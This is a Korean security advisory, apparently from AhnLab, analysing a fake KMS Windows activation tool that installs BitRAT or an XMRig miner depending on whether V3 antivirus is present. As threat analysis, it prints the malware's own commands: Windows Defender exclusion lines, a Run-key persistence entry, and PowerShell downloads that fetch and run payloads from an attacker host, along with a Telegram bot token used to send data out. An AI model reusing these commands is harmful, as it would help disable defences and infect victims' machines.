윈도우 정품 인증 툴로 위장한 악성코드 주의!

안랩은 최근 윈도우 정품 인증 툴로 위장한 BitRAT과 XMRig 코인 마이너가 유포 중인 것을 확인하였다. 해당 악성코드는 이전에도 웹하드를 통해 유포된 바 있으며, 특이점으로는 백신 설치 여부에 따라 설치되는 유형이 달라진다는 것이다.​ ​이와 관련된 유포 방식을 자세히 소개한다.

이전에도 BitRAT은 웹하드를 통해 MS 윈도우 정품 인증 툴과 MS 오피스 설치 프로그램으로 위장하여 유포된 이력이 있다(아래 ASEC 블로그 게시글 참고). 이번 사례도 동일한 공격자의 소행으로 추정되며, 특이한 점으로는 V3가 설치되지 않은 환경에서는 BitRAT 원격제어툴이 설치되지만, V3가 설치된 환경에서는 (BitRAT이 아닌) 코인 마이너를 설치한다는 것이다.

• 윈도우 정품인증 툴로 위장하여 유포 중인 BitRAT 악성코드

• 오피스 설치 프로그램으로 위장하여 유포 중인 BitRAT 악성코드

해당 악성코드의 최초 유포 사례는 확인되지 않으나, 현재 기준으로 미디어파이어(MediaFire)라는 파일 호스팅 사이트에 KMS 윈도우 정품 인증 툴로 위장한 압축 파일 형태로 업로드되어 있다([그림 1] 참고).

[그림 1] 미디어파이어에 업로드된 악성코드

다운로드 주소는 [그림 2]와 같이 국내 여러 커뮤니티 사이트를 통해 공유되었다.

[그림 2] 국내 커뮤니티 자료실 게시글

다운로드한 압축 파일을 풀면 [그림 3]과 같은 파일들을 확인할 수 있다. 파일 “KMS Tools Unpack.exe”는 7z SFX, 즉 실행 압축 파일이며, 실제로는 위장된 악성코드이다.

[그림 3] 압축 파일 내부에 존재하는 악성코드

일반적인 압축 프로그램들처럼 7z도 SFX 포맷을 제공하는데, 이를 사용하면 .zip이나 .z와 같은 압축 파일 대신 .exe라는 실행 파일이 생성된다. 이를 실행하는 것만으로도 제작자가 원하는 경로에 프로그램을 설치할 수 있으며, 이렇게 기능이 편리하기 때문에 주로 설치 프로그램에서 사용된다. 참고로 7z SFX는 단순히 내부에 포함된 파일들을 설치하는 것뿐만 아니라 추가적으로 설치 과정에서 특정 명령을 실행할 수 있는 기능을 제공한다.

해당 악성코드는 일반적인 인스톨러 형태와 달리 내부에 원본 악성코드가 없을 시 KMS 툴만 존재한다. 대신 다음과 같은 악의적인 명령들을 설치 과정에서 실행하여 악성코드를 추가로 설치한다. 다음 명령들은 악성코드 설치 경로로 추정되는 특정 경로에 대한 것으로, 윈도우 디펜더가 악성코드 검사를 하지 않도록 예외 경로로 추가하는 명령과 외부에서 추가적인 악성코드를 다운로드해 실행하는 명령으로 나뉜다.

[그림 4] 7z SFX 실행 시 수행하는 악의적인 명령

파워쉘 명령을 보면 “KMS.msi” 즉 msi 포맷의 악성코드를 다운로드해 실행할 것으로 보이지만 실제로는 실행 파일 포맷의 악성코드가 다운로드된다. “KMS.msi” 또한 다운로더로서 실행할 경우 “vmtoolsd”, “asdmon” 프로세스가 현재 실행 중인지를 검사한다. 해당 프로세스가 존재할 경우 추가적인 악성코드를 설치하지 않는 Anti VM 및 Anti Sandbox 기능이 있다.

이후 아래 명령을 이용해 다운로드할 악성코드의 경로 및 실행될 프로세스를 예외 경로 및 예외 프로세스로 등록한다.

> powershell.exe "-Command 

  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Temp'; 

  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe'; 

  Add-MpPreference -ExclusionProcess 'InstallUtil.exe'; 

  Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe'; 

  Add-MpPreference -ExclusionProcess 'svchost.exe'; 

  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Microsoft\Windows\INetCache\IE'"

다운로드되는 악성코드는 “%LOCALAPPDATA%\Google\software_reporter_tool.exe” 경로에 저장되는데 해당 경로를 Run 키에 등록하여 재부팅 이후에도 실행될 수 있도록 한다.

> cmd.exe "/c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe /f"

“KMS.msi”는 또 다른 특징이 있는데, 사용자 환경에 V3가 설치된 경우와 그렇지 않은 경우에 따라 설치되는 악성코드가 다르다. V3 설치 여부는 “ASDSvc” 프로세스의 현재 실행 여부로 결정한다.

[그림 5] V3 안티바이러스 제품의 유무에 따른 분기문

V3가 설치되어 있다면 “obieznne.msi”를, 아닐 경우에는 “wniavctm.msi”를 “%LOCALAPPDATA%\Google\software_reporter_tool.exe” 경로에 설치한다. 즉 실행된 악성코드는 구글 크롬 브라우저의 업데이트 프로그램으로 위장 중이기 때문에 일반 사용자들이 의심스러운 프로세스로 인지하기 힘들다.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/obieznne.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe"

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/wniavctm.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe"

지금까지의 과정이 끝나면 “KMS_Tool.msi” 파일이 설치된다. 현재 해당 파일은 다운로드가 불가능하여 정확한 확인이 어렵지만, 이는 실제 KMS 툴로 추정된다.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/KMS_Tool.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Temp\zxoeqxat.msi; cmd /c C:\Users\[사용자 이름]\AppData\Local\Temp\zxoeqxat.msi"

실제 KMS 툴이 설치되지 않더라도 사용자가 실행했던 “KMS Tools Unpack.exe” 파일이 삭제되고 동일한 아이콘의 KMS 툴이 “KMSTools.exe”라는 명칭으로 생성된다. 이에 따라 사용자는 새롭게 생성된 KMS 툴을 사용할 수 있기 때문에 악성코드에 감염된 사실을 인지하기 힘들다.

[그림 6] 악성코드 실행 이후 생성된 KMS 툴

마지막으로 텔레그램 API를 이용해 감염 시스템의 기본적인 정보들을 전송한 후 이를 자체적으로 삭제한다.

• 감염 시스템 정보 전달에 사용되는 텔레그램 API : hxxps://api.telegram[.]org/bot5538205016:AAH7S9IGtFpb6RbC8W2TfNkjD7Cj_3qxCnI/sendMessage

따라서 V3의 설치 여부에 따라 다른 악성코드가 설치되는 것을 알 수 있다. V3가 없는 환경에서 설치되는 “obieznne.msi”는 인젝터 악성코드로서 정상 프로그램인 “InstallUtil.exe”를 실행하고 원본 BitRAT을 인젝션한다. 즉 BitRAT은 InstallUtil 프로세스의 메모리 상에서 동작함으로써 정상 프로세스로 위장한다.

BitRAT은 다양한 기능을 제공하는 RAT 악성코드이다. 해당 악성코드가 시스템에 설치될 경우 프로세스 작업 / 서비스 작업 / 파일 작업 / 원격 명령 실행 등 감염된 시스템에 대한 기본적인 제어 기능 외에도 다양한 정보 탈취 기능과 HVNC, 원격 데스크탑, 코인 마이닝, 프록시를 공격자에게 제공한다.

[그림 7] BitRAT C&C 통신

V3가 설치된 환경에서는 BitRAT 대신 XMRig 코인 마이너가 설치된다. XMRig 또한 정상 프로그램인 “svchost.exe” 프로세스의 메모리 상에서 동작하기 때문에 채굴로 인해 컴퓨터가 느려지더라도 일반적인 사용자는 인지하기 어려울 수 있다.

[그림 8] XMRig 코인 마이너

• 마이닝 풀 URL : asia.randomx-hub.miningpoolhub[.]com:20580

• User : “coinzz88.test”

• Pass : “”

이와 같이 국내 자료 공유 사이트를 통해 악성코드가 활발하게 유포되고 있어 사용자의 주의가 필요하다. 자료 공유 사이트에서 다운로드한 실행 파일은 각별히 주의해야 하며, 유틸리티 및 게임 등의 프로그램은 반드시 공식 홈페이지에서 다운로드하는 것을 권장한다. 사용자들은 OS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한 악성코드의 감염을 사전에 차단할 수 있도록 유의해야 한다.

안랩에서는 해당 악성코드를 효과적으로 탐지 및 차단하고 있다. 

보다 자세한 내용은 ASEC 블로그를 통해 확인할 수 있다. 

▶ASEC 블로그 바로가기